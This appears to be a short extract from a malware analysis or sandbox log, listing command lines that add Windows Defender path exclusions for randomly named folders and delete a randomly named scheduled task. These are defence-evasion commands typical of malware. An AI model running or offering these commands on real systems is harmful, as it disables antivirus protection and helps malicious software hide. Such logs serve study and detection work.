- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\cRHunKoNTIE" /t REG_DWORD /d 0 /reg:32
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%ProgramFiles(x86)%\aVlQuiEOU" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\reg.exe' ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "%PROGRAMDATA%\gpONkMBmPnKIKHVB" /t REG_DWORD /d 0 /reg:64
- '%WINDIR%\syswow64\schtasks.exe' /DELETE /F /TN "sxUIfhIdgMVQN2"